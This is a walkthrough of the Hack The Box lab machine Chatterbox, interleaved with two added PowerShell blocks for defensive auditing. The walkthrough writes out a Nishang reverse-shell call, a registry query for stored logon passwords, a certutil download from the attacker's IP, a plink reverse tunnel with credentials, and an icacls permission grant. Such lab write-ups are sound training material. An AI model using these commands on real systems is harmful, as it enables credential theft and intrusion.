Chatterbox Walkthrough, HTB Retired Machine 03: OSCP-like Box, without Metasploit

Eshwar Janjirala
6 min read · Jan 3, 2024


Fast-forwarding to this series: I am working through all of the boxes that lead to OSCP, mainly focusing on the thinking methodology, "why we are doing what we're doing." At the end of the road, I am going to create a mind map. Please shower me with constructive feedback; I try to improve as I progress.

Reconnaissance:

Analyzing Nmap result:

Two ports, 9255 and 9256, are open: one is TCP and the other is UDP. Both are identified as the AChat chat system httpd.

The operating system is Windows 7, build 7601, Service Pack 1.

Enumeration:

  1. Buffer Overflow Exploitation.

The port of interest is 9256 (UDP, AChat). Searching for vulnerabilities with searchsploit,

we can spot a Remote Buffer Overflow exploit for AChat.

Inspecting the exploit, we can see that the bad characters are already handled for us. As published, its payload only launches calc.exe as a proof of concept, so the payload has to be replaced for the exploit to be useful to us.

Exploitation:

There are two ways of getting an initial foothold on the system with this exploit, and more if Metasploit is used. This procedure sticks to non-Metasploit methods, which is better practice here because the machine resembles OSCP boxes, where the use of Metasploit is limited to a single machine.

  1. First Approach:

The payload size is limited to around 512 bytes, which is very little room.

We can use a staged payload here: the stager takes fewer bytes, and the rest of the payload is fetched from our machine and executed on the victim later.

So, for this exploit to work, we have to generate our own payload. The bad characters are already listed inside the code; we only need to supply our address and payload options to get a shell, in this case a reverse shell. The payload can be generated as follows.

Example payload:

For this method to work, we need to run a Python HTTP server hosting the Invoke-PowerShellTcp reverse shell script from Nishang's PowerShell scripts.

Don't forget to append Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port 443 to the end of the PowerShell script you are hosting, so that the function is actually invoked when the script is downloaded and run.

And this can get you the shell you are looking for.

Method #2:

Non-Staged vs Staged Payloads:

And ta-da! The user flag is found.

Post-Exploitation:

Still, we can't access root.txt inside the Administrator directory.

I am using the following guide for enumeration. Please follow along to get a comprehensive understanding of Windows privilege escalation.

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"

We got the Alfred user's password; system enumeration has paid off.
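As an added defensive counterpart to the registry query above (example code, not part of the original walkthrough), this PowerShell audit reports whether a host stores an AutoLogon password in the Winlogon key and can remove it; the function names are my own.

```powershell
# Added defensive check (not from the original walkthrough): audit a host for
# AutoLogon credentials in the Winlogon key, the same data the reg query reads.
# Run from an elevated PowerShell session on the host being checked.
$WinlogonPath = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'

function Get-AutoLogonExposure {
    param([string]$Path = $WinlogonPath)
    $props = Get-ItemProperty -Path $Path -ErrorAction Stop
    $hasPassword = -not [string]::IsNullOrEmpty($props.DefaultPassword)
    # Exposure exists whenever a password is stored, regardless of the
    # AutoAdminLogon flag: this key is readable by every local user by default.
    $finding = if ($hasPassword) {
        'HIGH: plaintext credential readable by all local users'
    } else {
        'OK: no DefaultPassword value present'
    }
    [pscustomobject]@{
        AutoAdminLogon    = $props.AutoAdminLogon
        DefaultDomainName = $props.DefaultDomainName
        DefaultUserName   = $props.DefaultUserName
        # Never echo the secret itself; report only whether one is present.
        PlaintextPassword = $hasPassword
        Finding           = $finding
    }
}

function Remove-AutoLogonPassword {
    param([string]$Path = $WinlogonPath)
    # Remediation: drop the stored password and disable AutoAdminLogon.
    # If unattended logon is genuinely required, configure it with the
    # Sysinternals Autologon tool instead, which keeps the password as an
    # encrypted LSA secret rather than a plaintext registry value.
    Remove-ItemProperty -Path $Path -Name DefaultPassword -ErrorAction SilentlyContinue
    Set-ItemProperty -Path $Path -Name AutoAdminLogon -Value '0'
}

# Usage on the local host: report first, then remediate if a finding is HIGH.
$result = Get-AutoLogonExposure
$result | Format-List
if ($result.PlaintextPassword) { Remove-AutoLogonPassword }
```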

Let us continue to surf more with network enumeration.

netstat -ano shows the ports currently in use on the system.

It seems that two ports, 135 and 445, were invisible to our scan.

So, these ports are listening locally but are not reachable from outside, which is why the Nmap scan didn't show them. We can reach them with port forwarding, similar to SSH port forwarding, even though we have no SSH connection to the box right now.

Using a PuTTY (plink) tunnel is a good option since it supports port forwarding. If we can establish a plink connection from Alfred's session back to our machine, we might have a chance of escalating privileges further.

certutil -urlcache -f http://10.10.14.89/plink.exe plink.exe

I was using the 32-bit executable from the PuTTY website.

After getting plink onto the victim machine,

make sure root access over SSH is permitted on our Kali machine by changing the relevant setting in the SSH server configuration at line 32.

If this method doesn't work, change the port from 22 to another working port and try again; in my case HTB was blocking port 22 for some reason.

plink.exe -l kali -pw toor -P 4545 -R 445:127.0.0.1:445 10.10.14.89

This could get us to a root shell: it signs in to our box from inside the Chatterbox machine and forwards port 445 back to us, so the locally bound service becomes reachable from our side. This didn't work in my case.

Going forward, I also tried the Metasploit method, but it didn't work either.

Method #2:

We have access to the Administrator directory, but it seems we don't have access to the root.txt file inside it.

I was running around trying gigantic things, while the approach is this simple.

icacls root.txt /grant Users:F

After this, we can easily access it.
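Changing a file's DACL the way icacls does above only succeeds when the caller owns the object or holds the ChangePermissions (WRITE_DAC) right on it. As an added defensive check (example code, not from the original post), this PowerShell audit finds files under a sensitive directory that a low-privileged account could re-permission; the function name and the audited path are my own choices.

```powershell
# Added defensive check (not from the original walkthrough): flag files whose
# owner is not a privileged principal, or whose DACL grants broad groups
# write-level rights, since either lets a standard user change the ACL.
$PrivilegedOwners = @('BUILTIN\Administrators', 'NT AUTHORITY\SYSTEM',
                      'NT SERVICE\TrustedInstaller')
$BroadPrincipals  = @('BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users')
# Any ACE sharing a bit with these rights (Modify and FullControl included) counts.
$WriteLevel = [System.Security.AccessControl.FileSystemRights]'Write, Delete, ChangePermissions, TakeOwnership'

function Get-WeakFileAcl {
    param([Parameter(Mandatory)][string]$Path)
    Get-ChildItem -Path $Path -File -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $acl = Get-Acl -LiteralPath $_.FullName
            $ownerIsLowPriv = $PrivilegedOwners -notcontains $acl.Owner
            $weakAces = @($acl.Access | Where-Object {
                $_.AccessControlType -eq 'Allow' -and
                $BroadPrincipals -contains $_.IdentityReference.Value -and
                ($_.FileSystemRights -band $WriteLevel) -ne 0
            })
            if ($ownerIsLowPriv -or $weakAces.Count -gt 0) {
                [pscustomobject]@{
                    File       = $_.FullName
                    Owner      = $acl.Owner
                    OwnerIssue = $ownerIsLowPriv
                    WeakAces   = ($weakAces | ForEach-Object {
                                     "$($_.IdentityReference): $($_.FileSystemRights)" }) -join '; '
                }
            }
        }
}

# Usage: audit the local Administrator profile. Remediate a finding with
#   icacls <file> /setowner Administrators
#   icacls <file> /reset
# which restores ownership and re-applies the parent's inherited DACL.
Get-WeakFileAcl -Path 'C:\Users\Administrator' | Format-Table -AutoSize
```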

And we got the ROOOOOT flag!!

In summary:

Honestly, this box is a bit annoying to deal with. You need to reset it constantly to get the exploits to work, since other people will be using the same port numbers as you.

But it is still a good learning experience.

You get to use system enumeration commands to find hidden passwords, execute PowerShell commands remotely on the victim machine with a windows/exec CMD payload, perform file transfers, upgrade a Netcat shell to a Meterpreter shell, and finally elevate file permissions. I learned a lot of cool tricks from this machine. Hopefully, you had fun too.

Mind Map:

Why are we doing what we are doing?

Thank you for following along.


A Cybersecurity Grad at SLU, PenTest+, CySA+. I am Monkey D. Luffy; I am going to become the Pirate King.